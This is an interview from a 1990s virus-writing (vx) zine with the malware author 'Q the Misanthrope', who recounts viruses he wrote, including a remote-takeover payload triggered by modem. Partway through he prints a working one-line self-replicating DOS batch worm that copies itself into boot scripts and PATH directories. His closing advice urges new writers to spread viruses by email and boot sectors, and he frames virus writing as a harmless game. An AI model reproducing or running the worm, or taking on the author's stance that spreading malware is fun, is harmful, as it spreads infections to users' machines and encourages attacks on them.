               'ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿'
                º *: Interview with "Q" the Misanthrope :* º
                º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º
                º ******* -= nUcLeii"/Vx United =- ******* º
               'ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ'


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³How did you first get started with computers and programming?º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
A million years ago, OK, it was 26 years ago, I was taken to the University to
learn BASIC programming. This program was available through our Junior High
School once a week. The program was only available to "Gifted" individuals. I
wrote a couple of game programs. The next year, the same group of kids that
went to the University, rented a Teletype for the summer to be used at each
kid's home on a rotating basis. I continued to program. In High School, we also
had a Teletype to the same University. I stayed after school every day for the
4 years of High School, teaching myself. I have been into Electronics since I
was about 5. So in High School, I built my own PC. It cost about $3000 (I
earned every cent). It was a great PC. Processor Technologies S-100 mother
board, Intel 8080, 60K of Godbout memory, IMSAI Front Panel, 2 Northstar 89k
floppy drives, Northstar Math Processor Board. I had Electric Pencil, BASIC,
DEBUG and CPM.  I had to write 8080 assembly code to patch the I/O to the OS.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³What was your first experience with viruses?º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
WORMS (replicating but not appending) were my first experience.  This was in
BASIC in Junior High, I wrote one. My first virus encounter was Sunday, then
Stoned. These are real simple viruses and after Debugging them, I didn't learn
much. I learned more from a pirated copy of HELPPC about the fundamental
workings of the PC.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Why did you start coding viruses?º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I wanted my virus write-up in Patricia Hoffman's VSUM to be better than her
Gingerbread description. So I wrote SNAFU. To this day, the bitch has never
eval'd one of my viruses.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³What is your personal opinion about harmful payloads, and you ethicalº
³opinions around viruses?                                             º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I don't like destructive payloads. Trash the data is bad.  Make the hardware
malfunction weirdly is good. Hey, I figured out how to bypass with software the
Keyboard Key switch (if that isn't weird, I don't know what is). Ethics and
viruses, I feel that I am a purist as far as virus writing (I have never set any
of my creations free). I feel that some of the best research into the PC is by
virus writers. Viruses are the purest form of shareware. I feel that virus
writers write viruses to be able to share learning experiences with each other
and the rest of the world be damned. They are just playing Chess with other
virus writers and the AV community as a whole. The kids who actually release
harmful viruses do it for different reasons (ask them).
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Did you ever wind up with a job because of your experience with computers inº
³general?                                                                    º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Yes. I make very good money and do very little and have made myself non-
replaceable in the job that I have.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Have you had any direct contact with the av? What's your ethical opinionº
³about the av in general?                                                º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
No contact. I like playing Chess with them. We have a symbiotic relationship.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Why have you always worked alone? What is your view on vx groups?º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
In my previous interview with Cicatrix, I stated that I have never told anyone
what I did because if you ask anyone in prison why they are there, they will
tell you it was because they told someone. I always assume that most everything
that I do is illegal, so the less people involved the better. VX groups are a
great way to go if you are starting out, they are also good if they are at the
same level as you.  The best thing about VX groups is that they produce a mag
for everyone to learn from.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³How many "known" viruses have you written, and which pieces are your favoriteº
³work?                                                                        º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The answer to life, the universe and everything is: 42. That is also the number
of known virii I have made. My favorite one was HighJaq. HighJaq has a very
unique payload, your PC can be High-Jacked to gain full control of it. 
It works with your Modem, if you call the PC's Modem 3 times in 3 minutes, the 
PC resets (even if you are running Windows 95) and then waits for the hacker
to call again and is presented with a C:\> prompt. I got this idea from reading
an AV article discussing the various forms of destruction that a virus can do.
One side was the simple "Trash the data", then to the more advanced "Drop
random bits slowly", to the "No way to ever know which data has been
compromised" at the worst end of the destruction. I figured that if someone had
full access to you PC with TAX records and Bank statements and maybe your
journal, this would be the worst sort of compromise. HighJaq was created to
fill this void in the world. Thanks go to the AV community for giving me this
idea.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³When was the last time you wrote a virus?  Considering your taking thisº
³interview, you must be somewhat active still....                       º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I wrote Nul-Space and HMA-Boot and You-Got-it for 29A-2 just recently. I also
have been playing with some new techniques that might work for a virus. I am
currently writing an article for 29A-3.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Where do you think the technical aspects of virus code, the AV, and theº
³future of viruses in general are headed?                               º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Mr. Bill just announced what Microsoft's Email would be like in the future. Can
we say "Good-Times" is for real. What kind of butt-head would allow you to open
an Email message and have it automatically launch a Visual Basic script. Mr.
Bill is evil (this is not necessarily a bad thing) and is on our (the VX) side.
Sun developed JAVA to make it incapable of spreading a virus. Mr. Bill
developed Word with Macro's that make it easy to create viruses. The VX scene
will find all the holes Mr. Bill has created and exploit them to the extreme.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Do you feel like the hype over viruses with ever explode again like it did aº
³few years ago?                                                              º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The media hype may never be the same as it was about Michelangelo. The media got
burned by Make-A-Fee (Fool me once, shame on you, fool me twice, shame on me). 
But all these Email Hoax's have certainly created more hype than Michelangelo
ever did.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³From your point of view, how has the VX "scene" changed over time?º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
It really hasn't. You always had new faces, they stayed around for about a year
or two and then dropped off. New groups would start and old groups stop. BBS's
and Web sites come and go. The VX "scene" has always been an evolving and
changing thing. New techniques are developed by some but most just learn to
code their first unimpressive virus and don't go farther from there.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³According to the April 1998 Joe Wells wild list, it seems DA_Boys is stillº
³running free around Belgium, USA, Iceland, etc. Any comments?             º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
See what happens when you give children loaded guns. Da'Boys is harmless, it
disabled COM4. I am just surprised it is still around. I was pleased to see
that Da'Boys caused a copyright infringement problem for the AV guys. Microsoft
had the DOS Boot Sector copyrighted and the AV community had to get permission
to rebuild it.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Have you ever coded or had any interest in macro viruses?º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Almost, I wrote RAMBLE.WK1 that launched a virus from a 123 Macro. I have no
real interest in Macro viruses.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³What inspires you to come up with some of the "unorthodox" code. You haveº
³expressed many new ideas over time.                                      º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Ralf Brown's Interrupt list is the main source of inspiration. I also read all
the VX/AV articles and try to glean any new ideas from them. I like to
experiment with new ideas. I will play with a new idea and see if it has any
merit and maybe incorporate it into a virus. Most of my ideas that never make
it into a virus, they just exist as ASM files. I play with a new idea as often
as possible. Today's new concept is a single line replicating REM Batch file. 
This should not work, but it does:
@REM BAT.REM-WORM by Q the Misanthrope | %COMSPEC% NUL /F /CFOR %%Q IN (A:\ C:\
WINSTART.BAT %PATH% %WINBOOTDIR%\DOSSTART.BAT) DO COPY /B %0+%0.BAT %%Q
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Well, from an X-hackers point of view, what do you think about all this      º
³recent shit going on, i.e. the enforcers, mod, the pentagon hacks, the stolenº
³demo software, etc. etc.?                                                    º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
It seems to be there for the taking. As someone who has done hacking and gone
to prison for it, I would say don't do it unless you are under age. If you do
it, make it a Federal crime, the Federal facilities are much nicer.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Do you have any favorite writers/groups? Who and why?º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
David Gilmore, Roger Waters/Pink Floyd. I dig their music.
Terry Gilliam, John Cleese, Michael Palan, Terry Jones, Eric Idle and Graham
Chapman/Monty Python. I love the British sense of humor.
Gene Rodenbery/Star Trek. Good Sci-Fi drama.
This weeks cool virus writer: Soul Manager. The writer of the Red Team Email
Virus. Cool idea and implementation.
I have no favorite virus group. I love the zines each group puts out.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Have you ever considered making things like a polymorphic engines or creationº
³kits?                                                                        º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
What and be just like all the other kids on the block. No way. There are too
many out there and past the first one they were no longer innovative.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Anything else you want to say to VX coders young and old? The AV community?º
³Any other comments?                                                        º
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
To the new VX coder: 
read "Ralf Browns Interrupt List" and all the tutorials you can. Try to get
into "CodeBreakers" or a group for starters.
To the old:
keep on doing the "Voodoo you do so well".
To the AV community: I've got nothing to say.
Other comments: I think I am retiring. It has been fun. There is a lot of work
that needs to be done it the Win95/98/NT environment. I don't have the
resources or the time to play in that environment. When you develop viruses
for Win95/98/NT, don't forget to create a good transport medium for your virus.
Boot sector and Email seem to be the best for moving the virus from place to
place (see Red Team Email Virus). Finally, if any of my viruses have helped
you learn, you're welcome; if not, oh well.


